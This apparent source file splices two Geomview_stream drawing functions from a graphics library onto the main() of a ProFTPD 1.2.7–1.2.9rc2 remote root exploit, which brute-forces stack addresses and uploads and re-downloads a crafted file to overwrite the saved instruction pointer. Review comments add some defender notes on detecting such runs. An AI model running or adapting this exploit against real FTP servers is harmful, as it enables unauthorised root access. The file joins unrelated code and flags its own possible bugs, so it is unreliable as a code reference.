/// Sends a `backcolor` command for the window named "Camera".
///
/// Each channel of @p c is converted to double and divided by 255.0 before it
/// is written, so the command carries three fractional values in r, g, b
/// order. The command is emitted with the stream in ASCII mode; the value
/// returned by set_ascii_mode() is passed back to it afterwards.
///
/// @param c  colour whose r(), g() and b() accessors supply the channels.
void Geomview_stream::set_bg_color(const Color &c)
{
    const double channel_max = 255.0;
    const double red   = static_cast<double>(c.r()) / channel_max;
    const double green = static_cast<double>(c.g()) / channel_max;
    const double blue  = static_cast<double>(c.b()) / channel_max;

    // Keep what set_ascii_mode() returns so it can be handed back below.
    const bool previous_ascii = set_ascii_mode();

    // NOTE(review): no separator is written between the three numbers here;
    // presumably the stream's inserter for double adds one in ASCII mode —
    // confirm against the class definition.
    Geomview_stream &gv = *this;
    gv << "(backcolor \"Camera\" "
       << red
       << green
       << blue
       << ")";

    set_ascii_mode(previous_ascii);
}
/// Sends a `pickplane` geometry built from one face of @p bbox and marks it
/// as not pickable.
///
/// The quad is written as a QUAD BINARY object while the stream is in binary
/// mode. Every corner uses bbox.zmin(), so the quad is the z = zmin face of
/// the box, listed as (xmin,ymin), (xmin,ymax), (xmax,ymax), (xmax,ymin).
///
/// @param bbox  bounding box supplying the corner coordinates.
void Geomview_stream::pickplane(const Bbox_3 &bbox)
{
    // Switch to binary output and keep whatever set_binary_mode() returns.
    const bool saved_mode = set_binary_mode();

    Geomview_stream &gv = *this;
    gv << "(geometry pickplane {QUAD BINARY\n"
       // count written ahead of the corner data (presumably the number of quads)
       << 1
       // the four corners, all at z = zmin
       << bbox.xmin() << bbox.ymin() << bbox.zmin()
       << bbox.xmin() << bbox.ymax() << bbox.zmin()
       << bbox.xmax() << bbox.ymax() << bbox.zmin()
       << bbox.xmax() << bbox.ymin() << bbox.zmin()
       // close the text bracket
       << "}) (pickable pickplane no)";

    // NOTE(review): the saved value came from set_binary_mode() but is handed
    // to set_ascii_mode(), whereas set_bg_color() saves and restores through
    // the same setter. Confirm against the class definition that this really
    // restores the caller's mode rather than inverting it.
    set_ascii_mode(saved_mode);
}
// Entry point of a proof-of-concept exploit; its banner names ProFTPD
// 1.2.7 - 1.2.9rc2 as the affected releases.
//
// Flow visible in this function:
//   1. Parse options: -t server, -u user, -p password, -l local IP,
//      -s sleep 10 s before the first download, -U upload path, -P FTP port,
//      -S first candidate address (parsed as hex).
//   2. For every 4-byte step from that address up to STACK_END: connect, log
//      in, upload a generated file in ASCII mode, reconnect, then download
//      the same file twice.
//   3. If the loop runs out of candidates, print a failure message and
//      exit(1). The only exits visible here are failure paths; whatever
//      happens on success is inside helpers that are not part of this excerpt.
//
// All helpers (connect_to_server, login_to_server, set_passive_mode, ...) and
// the globals they share (server, user, pass, controlSock, retAddr, ...) are
// defined outside this excerpt. set_ascii_mode() here is a free function of
// this program, unrelated to the Geomview_stream member of the same name.
//
// Defender notes (review):
//   - The sequence needs a working FTP login and a path the account can
//     write to, so accounts without upload rights do not offer this path.
//   - A run is a brute force: each candidate address costs two control
//     connections, one upload and two downloads of the same file, so it should
//     show up as a long burst of short, near-identical sessions from one
//     client — presumably visible in the server's transfer log; confirm
//     against your logging configuration.
//   - Servers running a release outside the range printed in the banner are
//     outside what this program claims to affect.
int main(int argc,char **argv)
{
  int sleepMode=0;
  char c;
  unsigned int stackStartAddr=STACK_START;

  if(argc<2) usage(argv[0]);

  // Command-line parsing; unknown options print the usage text and return 1.
  while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) {
    switch (c) {
      case 't': server=optarg; break;
      case 'u': user=optarg; break;
      case 'p': pass=optarg; break;
      case 'l': localIP=optarg; break;
      case 's': sleepMode=1; break;
      case 'U': strncpy(uploadPath,optarg,SIZE); break;
      case 'P': ftpPort=atoi(optarg); break;
      case 'S': stackStartAddr=strtoul(optarg, NULL, 16); break;
      default: usage(argv[0]); return 1;
    }
  }

  // Both the target server and the local IP are mandatory.
  if(server==NULL || localIP==NULL) usage(argv[0]);

  printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
  printf(" by Haggis ([email protected])\n");
  doris_chroot_breaker();   // helper defined outside this excerpt

  // One iteration per candidate address, stepping 4 bytes at a time.
  for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {
    // Candidates rejected by check_for_linefeed() (not shown) are skipped.
    if(check_for_linefeed()==FAILURE) continue;
    retAddr=stackWriteAddr+200; // good enough for show business

    // First session: log in and upload the generated file in ASCII mode.
    if((controlSock=connect_to_server(ftpPort))==FAILURE) {
      perror("\n\nFailing to connect to remote host\n");
      exit(1);
    }
    if(login_to_server()==FAILURE) {
      close(controlSock);
      printf("\nERROR: Login failed.\n");
      exit(1);
    }
    if(set_passive_mode(UPLOAD)==FAILURE) goto err;
    if(set_ascii_mode()==FAILURE) goto err;
    if(set_path_and_filename()==FAILURE) goto err;

    // create the buffer containing RET for this
    // brute-force iteration
    create_exploit_buffer();
    if(upload_file()==FAILURE) goto err;
    close(controlSock);

    // Connect again, then login, set ASCII mode and download the exploit file.
    // This will trigger the overflow; as a result, we've
    // corrupted the memory pool of this session and when we
    // download the file again, the stack area will be overwritten
    // and we control the saved EIP.
    if((controlSock=connect_to_server(ftpPort))<0) {
      perror("\nFailed to connect to remote host\n");
      exit(1);
    }
    login_to_server(user,pass);
    set_path_and_filename();
    if(set_ascii_mode()==FAILURE) goto err;
    if(set_passive_mode(DOWNLOAD)==FAILURE) goto err;
    if(sleepMode) sleep(10);   // optional pause requested with -s
    if(download_file(NORMAL_DOWNLOAD)==FAILURE) goto err;

    // Finally, read the file again. This will trigger the stack
    // overwrite (NOT the overflow, that happened earlier). We could
    // control EIP at this point and r00t may be only heartbeat away...
    if(set_passive_mode(DOWNLOAD)==FAILURE) goto err;
    if(download_file(EXPLOIT_DOWNLOAD)==FAILURE) goto err;

    // Every path through an iteration ends here, so the control socket is
    // closed before the next candidate is tried.
err:
    close(controlSock);
  }

  // This is only reached if the bruteforce fails.
  // delete the exploit files here
  // NOTE(review): nothing in this function actually deletes them, so the
  // uploaded file is presumably left in the upload path on the server.
  printf("\n\nNo r00t for you today I'm afraid.\n");
  exit(1);
}